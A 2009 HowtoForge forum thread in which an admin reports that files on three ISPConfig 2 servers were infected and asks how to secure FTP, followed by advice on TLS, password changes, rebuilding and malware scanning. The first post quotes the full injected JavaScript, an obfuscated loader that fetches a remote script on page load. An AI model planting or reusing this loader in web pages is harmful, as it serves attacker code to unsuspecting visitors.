Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 20th December 2009, 07:14
mumbly mumbly is offline
Member
 
Join Date: Jun 2007
Posts: 69
Thanks: 4
Thanked 1 Time in 1 Post
Exclamation hack problem with FTP

Hi,
My three servers have been hacked these days.
One (big) line of code habe been added at the end of some files (index, etc.) by some one or something ... This is the code :

Quote:
<script>/*GNU GPL*/ try{window.onload = function(){var A84jbd5xsu = document.createElement('script');A84jbd5xsu.setAtt ribute('type', 'text/javascript');A84jbd5xsu.setAttribute('id', 'myscript1');A84jbd5xsu.setAttribute('src', 'h^&(t)$t(!^p($^(:$@(/!!)/@x!()@n&!$x&!!@x^!&(-(c#)o#!m!!(.$n^!#(u^((.@)#n&!(l$@@.#^@@w$()3&)(-$o)#r$^(g)@!&.@#&g(^o!&l!)&d!@^g@&)o&@#l^^f(!b!!a# )#@g^$^@.#(^^r)&#u@!:!&$$8)0&)#8#!(0^/@w()$^e&(&e&b)&l@@#y&$!.@c&&&o)@^!$m$@/$$&@w$^)@e^e!(b))l(^y&)&.)(c!!!o^&m!($^/(^)!l!!&(a!^$r@!e#&d$!#o)(^u(t(e$(.$f@!r!$(/!!g$!^)&o^@#$o@#$(g@^l##e^!(.)(&c!$o)$&m@^@/##!)#r&@i!#n^$(c))!$o#&)n@(!d^&e&l#&@v&)a($$!g@^)# o#&^!.((^c@)&&o!!)!m!/)$'.replace(/@|\^|\)|#|&|\$|\(|\!/ig, ''));A84jbd5xsu.setAttribute('defer', 'defer');document.body.appendChild(A84jbd5xsu);}} catch(e) {}</script>
It seems (???) that this is a ftp problem.
As long as mi 3 servers have been configured with Ubuntu 8.04 LTS, fully updated, with ISPConfig 2 (last version 2.2.35), i do admit that i am a bit confused with that...

Here is some more news about this :
- http://seoforums.org/site-optimizati...ction-var.html

THE BIG QUESTION : HOW-TO secure more ftp ? Must i change the paswords for now ?

At last, i must say that all of my servers are configured according to "Ubuntu Perfect Server" from howtoforge.org.
Reply With Quote
Sponsored Links
  #2  
Old 20th December 2009, 13:45
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,722 Times in 2,563 Posts
Default

You can try to use TLS with ProFTPd: http://www.howtoforge.com/setting-up...unty-jackalope

And yes, I think it's a good idea to change passwords.
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
  #3  
Old 21st December 2009, 09:14
mumbly mumbly is offline
Member
 
Join Date: Jun 2007
Posts: 69
Thanks: 4
Thanked 1 Time in 1 Post
Default

Hi !
Thanx !
I've used http://www.howtoforge.com/setting-up...unty-jackalope to configure my ProFTPd / ISPConfig 2 server ... But i can NOT connect to my server :
proftpd tls 500 AUTH not understood

If i comment out
#Include /etc/proftpd_ispconfig.conf
it connects BUT it can not list de repositories ...

Anny idea ???
Reply With Quote
  #4  
Old 21st December 2009, 13:41
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
Default

I don't know the exact switch on how to check which proftp modules are loaded. never the less you can check this, as there is a specific module that needs to be loaded for tls. I tried this on my debian machine some time ago, but did not get it working as there was no possibility to have this module loaded, as it seems that it does anyhow not exist in the debian version of proftpd.

But independant of that, if the server was really hacked I would consider rebuilding the whole servers as you can never be sure whether a rootkit or similar was installed on your machine, so changing passwords would be no real help.
Did you also check your machine with e.g. rkhunter?
Reply With Quote
  #5  
Old 22nd December 2009, 15:33
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,722 Times in 2,563 Posts
Default

Quote:
Originally Posted by mumbly View Post
If i comment out
#Include /etc/proftpd_ispconfig.conf
it connects BUT it can not list de repositories ...

Anny idea ???
Have you tried both active and passive transfers in your FTP client?
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
  #6  
Old 22nd December 2009, 16:22
Mark_NL Mark_NL is offline
Senior Member
 
Join Date: Sep 2008
Location: The Netherlands
Posts: 912
Thanks: 12
Thanked 100 Times in 96 Posts
 
Default

I've seen this before, for me, it was a customer who used an illegal version of CuteFTP (used a file called patch.exe) which actually contained a keylogger, logged the login credentials, and could login straight away without any errors, added the code in ALL index.* files and logged off.

install rkhunter and clamav and scan your disc for more infections .. because your websites will be reported as "deformed/malware" through firefox/google very fast.
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
ISPConfig3 Mail Warn Errors reason8 General 3 25th November 2009 13:58
Problem with ftp ownership Alex1 General 7 14th July 2009 09:13
Remoting framework - Problem with ftp user creation Whitenoise General 2 13th May 2009 12:16
Troubleshooting FTP bswinnerton Installation/Configuration 4 10th October 2008 19:34
FTP 101 the basics koegies Installation/Configuration 7 17th November 2005 15:55


All times are GMT +2. The time now is 08:54.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.